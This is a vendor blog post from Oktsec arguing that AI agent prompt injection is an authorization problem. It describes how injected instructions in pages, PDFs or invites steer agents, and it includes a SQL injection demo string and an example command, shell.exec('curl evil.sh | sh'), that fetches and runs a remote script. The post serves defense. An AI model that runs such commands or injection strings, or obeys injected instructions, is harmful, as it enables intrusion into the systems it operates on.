Prompt injection is an authorization problem.
Content filters lose this arms race by design. The durable fix is to stop policing what the model read and start enforcing what the agent is allowed to do.
The short version
- Prompt injection is not a content bug to be filtered away; it is untrusted input reaching a privileged action.
- Detection-based defenses are probabilistic and lose to novelty. Authorization is deterministic and holds.
- Decide what an agent may do before it acts, then verify afterward what it actually did against signed policy.
- Oktsec implements this as a control loop: signed policy in, work applied in the environment, verified evidence back.
If you have shipped anything with an LLM agent in the last year, you have read a thread like this: someone hides an instruction inside a web page, a PDF, a code comment or a calendar invite; the agent reads it; the agent does something it should not. The reaction is almost always the same. Add a classifier. Add a guardrail. Add a system prompt that says, firmly, to ignore malicious instructions.
Then someone finds a new phrasing, and the cycle repeats. This is not a string of unlucky bugs. It is the predictable result of treating an authorization problem as a content problem.
Why filtering loses
Content filtering asks an unanswerable question: is this text trying to manipulate the model? The space of malicious phrasings is unbounded, multilingual, and trivially obfuscated. Every filter you add is a probabilistic classifier sitting in front of a system that, by design, follows instructions in natural language. You are trying to win a debate against every sentence on the internet.
Worse, the cost of a single miss is not a bad paragraph. It is a real action: a shell command, a database write, a credential read, a pull request merged to main. The blast radius is set by what the agent can do, not by what it read. Filtering tries to shrink the inputs. It does nothing to the blast radius.
The question is not "was this prompt malicious?" It is "should this agent, in this environment, be allowed to take this action right now?"
Reframe: untrusted input meets privileged action
Security has solved a version of this before. We do not stop SQL injection by detecting mean-spirited SQL; we stop it by separating data from commands with parameterized queries. We do not stop cross-site scripting by guessing which strings are scripts; we stop it by controlling where untrusted data is allowed to execute.
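To make the SQL analogy concrete, here is a minimal sketch using Python's standard sqlite3 module. The table, the rows and the hostile string are made up for illustration. The same input is dangerous when concatenated into the command and inert when passed as a parameter.

```python
import sqlite3

# In-memory database with illustrative (made-up) data.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "admin"), ("bob", "user")],
)

# Untrusted input that tries to rewrite the query.
hostile = "nobody' OR '1'='1"

# Vulnerable: the input is spliced into the command itself,
# so the OR clause becomes part of the SQL and matches every row.
unsafe_rows = conn.execute(
    "SELECT name FROM users WHERE name = '" + hostile + "'"
).fetchall()

# Safe: the input travels as data through a placeholder,
# so it is only ever compared against the name column.
safe_rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)
).fetchall()

print(len(unsafe_rows), len(safe_rows))
```

Nothing in the safe version inspects the string for malice. The structure of the query simply leaves untrusted data no way to become a command.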
Agents need the same move. The moment untrusted input can reach a privileged action without a deterministic check in between, you have a vulnerability, regardless of how clever your prompt is. So put the check there: at the boundary between intent and action.
What an authorization boundary looks like for agents
Concretely, three things have to be true at the point an agent tries to act:
- The action is named and scoped. Tool calls, network egress, file writes and credential reads are explicit capabilities, not ambient powers the agent happens to have because it runs on a machine that has them.
- A deterministic rule decides allow-or-deny. No model sits in the enforcement path. The same request under the same policy always yields the same decision, and that decision is reviewable after the fact.
- The decision produces evidence. What was attempted, what policy applied, and what happened are recorded as a verifiable artifact, not a log line you hope someone reads.
Notice what this does to prompt injection. The attacker can still slip an instruction past the model. The agent can still decide to run shell.exec("curl evil.sh | sh"). But the action hits a policy that never put shell.exec on the allow-list for that environment, so it is denied and routed for review. The injection succeeded at the language layer and failed at the layer that matters.
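The check described above can be sketched in a few lines. This is an illustration under stated assumptions, not Oktsec's implementation: the environment names, the capability names other than shell.exec, and the POLICY, Decision and authorize identifiers are all hypothetical.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet


@dataclass(frozen=True)
class Decision:
    """Structured record of one allow-or-deny decision (hypothetical shape)."""
    allowed: bool
    environment: str
    capability: str
    reason: str


# Hypothetical allow-list: each environment names the capabilities it may use.
# Anything not listed is denied by default.
POLICY: Dict[str, FrozenSet[str]] = {
    "ci-runner": frozenset({"fs.read", "fs.write", "git.commit"}),
    "support-bot": frozenset({"tickets.read", "tickets.reply"}),
}


def authorize(environment: str, capability: str) -> Decision:
    """Pure set lookup: no model call, no scoring, same answer every time."""
    allowed_caps = POLICY.get(environment)
    if allowed_caps is None:
        return Decision(False, environment, capability, "unknown environment")
    if capability in allowed_caps:
        return Decision(True, environment, capability, "capability on allow-list")
    return Decision(False, environment, capability, "capability not on allow-list")


# The injected instruction persuaded the model, but the action is still denied.
injected = authorize("ci-runner", "shell.exec")
routine = authorize("ci-runner", "fs.read")
print(injected)
print(routine)
```

The function never sees the prompt, the web page or the model's reasoning. It sees only the environment and the capability being requested, which is why a new phrasing of the attack changes nothing.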
Before and after, not just before
Authorization at the moment of action is necessary but not sufficient. Agents are long-running and stateful; environments drift; policy gets updated. So the boundary has two halves.
Before: the environment pulls signed policy and applies it locally, so the rules in force are exactly the rules you authored, not a stale copy and not a tampered one. After: the environment reports what it actually did, and that evidence is compared against what was expected. When they match, the environment is aligned. When they diverge, the failure state is named: stale, different, missing, or unverified.
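A rough sketch of the "after" half follows, with several assumptions made loudly. It uses an HMAC with a shared secret from the Python standard library as a stand-in for real signatures; a production system would more likely use asymmetric signatures so environments cannot forge policy. The report format, the function names and the exact meaning given to each state (stale as an older policy version, different as a mismatched policy digest) are hypothetical readings of the four states named above, not a documented Oktsec format.

```python
import hashlib
import hmac
import json
from typing import Optional

# Assumption: a demo-only shared secret standing in for a real signing key.
KEY = b"demo-only-shared-secret"


def canonical(doc: dict) -> bytes:
    """Serialize deterministically so equal documents give equal bytes."""
    return json.dumps(doc, sort_keys=True, separators=(",", ":")).encode("utf-8")


def sign(doc: dict, key: bytes = KEY) -> str:
    return hmac.new(key, canonical(doc), hashlib.sha256).hexdigest()


def verify(doc: dict, signature: str, key: bytes = KEY) -> bool:
    # Compare as bytes in constant time.
    return hmac.compare_digest(sign(doc, key).encode(), signature.encode())


def policy_digest(policy: dict) -> str:
    return hashlib.sha256(canonical(policy)).hexdigest()


def make_report(applied_policy: dict) -> dict:
    """What a (hypothetical) environment sends back after applying policy."""
    body = {
        "policy_version": applied_policy["version"],
        "policy_digest": policy_digest(applied_policy),
    }
    return {"body": body, "signature": sign(body)}


def classify(expected_policy: dict, report: Optional[dict]) -> str:
    """Name the state of one environment relative to the expected policy."""
    if report is None:
        return "missing"        # no evidence came back at all
    body = report.get("body")
    signature = report.get("signature")
    if not isinstance(body, dict) or not isinstance(signature, str):
        return "unverified"     # malformed evidence cannot be trusted
    if not verify(body, signature):
        return "unverified"     # signature does not match the body
    if body.get("policy_version", -1) < expected_policy["version"]:
        return "stale"          # environment still runs an older policy
    if body.get("policy_digest") != policy_digest(expected_policy):
        return "different"      # rules in force are not the rules authored
    return "aligned"


current = {"version": 2, "allow": ["fs.read", "git.commit"]}
old = {"version": 1, "allow": ["fs.read"]}
drifted = {"version": 2, "allow": ["fs.read", "git.commit", "shell.exec"]}

forged = make_report(current)
forged["signature"] = "0" * 64

states = [
    classify(current, make_report(current)),
    classify(current, make_report(old)),
    classify(current, make_report(drifted)),
    classify(current, None),
    classify(current, forged),
]
print(states)
```

The point of naming each state is that every divergence becomes a specific, reviewable finding rather than a generic alert.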
What this means in practice
If you are defending an agent today, the highest-leverage work is not a better injection classifier. It is inventory and scope: enumerate every environment where an agent does company work, list the capabilities each one actually needs, and put a deterministic policy at the action boundary. Then make the evidence reviewable so you can prove, after the fact, what every agent was allowed to do and what it did.
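The inventory step can start as something very small. The sketch below assumes you can write down, per environment, the capabilities an agent currently has and the ones it actually needs. All environment and capability names are hypothetical. It reports the excess, which is the part of the blast radius you can remove without breaking any work.

```python
from typing import Dict, Set

# Hypothetical inventory: what each environment can do today.
granted: Dict[str, Set[str]] = {
    "ci-runner": {"fs.read", "fs.write", "git.commit", "shell.exec", "net.egress"},
    "support-bot": {"tickets.read", "tickets.reply"},
    "laptop-agent": {"fs.read", "credentials.read"},
}

# Hypothetical scope: what each environment needs to do its job.
needed: Dict[str, Set[str]] = {
    "ci-runner": {"fs.read", "fs.write", "git.commit"},
    "support-bot": {"tickets.read", "tickets.reply"},
    "laptop-agent": {"fs.read"},
}


def excess_capabilities(
    granted: Dict[str, Set[str]], needed: Dict[str, Set[str]]
) -> Dict[str, Set[str]]:
    """Return, per environment, capabilities granted but not needed."""
    report: Dict[str, Set[str]] = {}
    for env, caps in granted.items():
        # An environment with no declared needs is treated as needing nothing.
        extra = caps - needed.get(env, set())
        if extra:
            report[env] = extra
    return report


excess = excess_capabilities(granted, needed)
for env in sorted(excess):
    print(env, sorted(excess[env]))
```

Once the excess is removed, the needed sets become the allow-list that the policy at the action boundary enforces.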
Filters still have a place as defense in depth. But treat them as what they are, a probabilistic outer layer, and put your trust in the deterministic one underneath.
This is the thesis Oktsec is built on. The control loop in this article (signed policy in, work applied in the environment, verified evidence back) is the product.